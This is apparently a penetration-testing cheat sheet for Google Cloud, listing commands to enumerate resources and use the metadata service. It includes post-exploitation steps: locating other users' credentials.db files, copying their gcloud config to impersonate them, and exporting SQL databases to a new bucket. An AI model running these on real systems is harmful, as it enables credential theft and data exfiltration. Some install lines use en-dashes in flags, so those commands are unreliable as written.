Cloud Pen-testing Part -5

## Virtual Machines

List compute instances

```shell
gcloud compute instances list

Get shell access to an instance

gcloud beta compute ssh --zone "<region>" "<instance name>" --project "<project name>"

Puts public SSH key onto the metadata service for the project

gcloud compute ssh <local host>

Get access scopes if on an instance

curl http://metadata.google.internal/computeMetadata/v1/instance/serviceaccounts/default/scopes -H 'Metadata-Flavor:Google'

Use Google keyring to decrypt encrypted data

gcloud kms decrypt --ciphertext-file=encrypted-file.enc --plaintext-file=out.txt --key <crypto-key> --keyring <crypto-keyring> --location global

Storage Buckets

List Google Storage buckets

gsutil ls

List Google Storage buckets recursively

gsutil ls -r gs://<bucket name>

Copy an item from a bucket

gsutil cp gs://bucketid/item ~/

Webapps & SQL

List WebApps

gcloud app instances list

List SQL instances

gcloud sql instances list
gcloud spanner instances list
gcloud bigtable instances list

List SQL databases

gcloud sql databases list --instance <instance ID>
gcloud spanner databases list --instance <instance name>

Export SQL databases and buckets

First copy buckets to a local directory

gsutil cp gs://bucket-name/folder/ .

Create a new storage bucket, change permissions, export SQL DB

gsutil mb gs://<googlestoragename>
gsutil acl ch -u <service account> gs://<googlestoragename>
gcloud sql export sql <sql instance name> gs://<googlestoragename>/sqldump.gz --database=<database name>

Networking

List networks

gcloud compute networks list

List subnets

gcloud compute networks subnets list

List VPN tunnels

gcloud compute vpn-tunnels list

List Interconnects (VPN)

gcloud compute interconnects list

Containers

gcloud container clusters list

GCP Kubernetes config file ~/.kube/config gets generated when you are authenticated with gcloud and run:

gcloud container clusters get-credentials <cluster name> --region <region>

If successful and the user has the correct permission, the Kubernetes command below can be used to get cluster info:

kubectl cluster-info

Serverless

GCP functions log analysis – May get useful information from logs associated with GCP functions

gcloud functions list
gcloud functions describe <function name>
gcloud functions logs read <function name> --limit <number of lines>

Gcloud stores credentials in ~/.config/gcloud/credentials.db. Search home directories:

sudo find /home -name "credentials.db"

Copy gcloud dir to your own home directory to authenticate as the compromised user:

sudo cp -r /home/username/.config/gcloud ~/.config
sudo chown -R currentuser:currentuser ~/.config/gcloud
gcloud auth list

Other Useful Cloud Tools and Techniques

ScoutSuite

Multi-cloud security auditing tool

Install ScoutSuite

sudo apt-get install virtualenv
git clone https://github.com/nccgroup/ScoutSuite
cd ScoutSuite
virtualenv –p python3 venv
source venv/bin/activate
pip install –r requirements.txt

To run as root

sudo apt-get install virtualenv
sudo su
virtualenv -p python3 venv
source venv/bin/activate
pip install scoutsuite

Scan AWS environment with ScoutSuite

python scout.py aws --profile=<aws profile name>
# or if installed...
scout aws --profile=<aws profile name>

Cloud_Enum

Tool to search for public resources in AWS, Azure, and GCP

python3 cloud_enum.py -k <name-to-search>